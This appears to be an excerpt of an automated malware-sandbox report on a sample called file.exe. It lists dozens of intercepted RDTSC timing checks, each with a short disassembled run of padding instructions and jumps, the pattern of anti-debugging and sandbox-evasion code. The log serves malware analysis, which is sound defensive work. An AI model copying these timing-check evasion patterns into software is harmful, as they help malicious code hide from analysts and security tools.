                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A7162 second address: 9A717D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A005h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A717D second address: 9A71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F74491B01D6h 0x0000000d jmp 00007F74491B01E9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A382D7 second address: A382E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A382E1 second address: A382EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A382EF second address: A382F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AF15 second address: A3AF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AA65 second address: A3AA6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AC00 second address: A3AC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DEh 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jno 00007F74491B01D6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 push esi 0x00000018 jmp 00007F74491B01E1h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AC33 second address: A3AC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A426A4 second address: A426BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F74491B01E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A426BB second address: A426C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41356 second address: A41360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41360 second address: A41368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41368 second address: A4136E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4136E second address: A4137E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jl 00007F7448D3A04Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4137E second address: A41384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41384 second address: A41388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41388 second address: A413C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F74491B01E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F74491B01E7h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A413C1 second address: A413C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41512 second address: A41518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41518 second address: A4152F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FF6h 0x00000008 jmp 00007F7448D39FFAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4152F second address: A41541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41541 second address: A41547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41674 second address: A41678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41678 second address: A4169C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7448D3A003h 0x0000000b pop eax 0x0000000c jnp 00007F7448D3A004h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4169C second address: A416A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A417D8 second address: A417DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419A0 second address: A419AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419AC second address: A419C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D39FFCh 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45411 second address: A4542D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4542D second address: A45434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48987 second address: A48993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F74491B01D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48AFB second address: A48B24 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7448D39FFFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7448D39FFCh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48C50 second address: A48C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48C54 second address: A48C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DBD second address: A48DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DC2 second address: A48DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7448D3A005h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DDB second address: A48DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F74491B01D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48DE9 second address: A48DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491B0 second address: A491B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491B4 second address: A491C4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FF6h 0x00000008 jne 00007F7448D39FF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491C4 second address: A491DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F74491B01DDh 0x00000008 jbe 00007F74491B01D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF0B second address: A4EF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A005h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF26 second address: A4EF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EF2E second address: A4EF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F1C1 second address: A4F1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F74491B01F9h 0x0000000b jmp 00007F74491B01DDh 0x00000010 jmp 00007F74491B01E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F74491B01D6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F1F7 second address: A4F20C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7448D39FF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F20C second address: A4F210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F210 second address: A4F22C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFCh 0x00000007 jmp 00007F7448D39FFCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F4D7 second address: A4F4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A500D0 second address: A500E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A500E9 second address: A500ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A500ED second address: A5010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A007h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5010A second address: A50110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50683 second address: A5069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A007h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54B9E second address: A54BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54CF3 second address: A54CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55129 second address: A5513F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F74491B01DEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5513F second address: A55145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552C6 second address: A552CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552CA second address: A552CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552CE second address: A552D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552D4 second address: A552DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A552DA second address: A552E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55455 second address: A55484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A001h 0x00000009 popad 0x0000000a jmp 00007F7448D3A009h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A555EE second address: A55634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F74491B01D6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F74491B01E7h 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007F74491B01DDh 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA49 second address: A5BA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A636EE second address: A63716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F74491B01DCh 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F74491B01E4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A618D4 second address: A618D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A618D8 second address: A618EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61A3D second address: A61A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61A45 second address: A61A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61A4C second address: A61A68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7448D3A002h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61CF3 second address: A61D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E1h 0x00000009 je 00007F74491B01D6h 0x0000000f jbe 00007F74491B01D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61D19 second address: A61D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61E55 second address: A61E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F74491B01E1h 0x0000000c jnl 00007F74491B01D8h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A622BE second address: A622D5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7448D39FF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F7448D39FF6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6259F second address: A625A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A626C4 second address: A626C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A626C9 second address: A62726 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F74491B01DCh 0x00000008 push eax 0x00000009 jmp 00007F74491B01DFh 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jng 00007F74491B01DCh 0x00000018 jmp 00007F74491B01E7h 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F74491B01E3h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E0F second address: A62E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6ADA4 second address: A6ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F74491B01D6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jg 00007F74491B01DEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A823 second address: A6A82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A82C second address: A6A834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A834 second address: A6A83A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A714B9 second address: A714CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F74491B01D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7135C second address: A71373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A003h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A783A7 second address: A783AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A780A8 second address: A780D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7448D3A001h 0x0000000b popad 0x0000000c jmp 00007F7448D3A008h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD22 second address: A7CD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DFh 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F74491B01E0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD49 second address: A7CD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD4E second address: A7CD59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F74491B01D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD59 second address: A7CD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD65 second address: A7CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01DFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD7B second address: A7CD8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F7448D39FF6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CED0 second address: A7CEDA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89F9A second address: A89FAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7448D39FFAh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B679 second address: A8B687 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F74491B01D8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90AF9 second address: A90B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7448D39FF6h 0x0000000a jns 00007F7448D39FF6h 0x00000010 popad 0x00000011 jmp 00007F7448D3A007h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90B21 second address: A90B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F74491B01DAh 0x0000000e jmp 00007F74491B01DBh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95484 second address: A95497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7448D39FFEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95760 second address: A9576B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F74491B01D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A958BB second address: A958CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
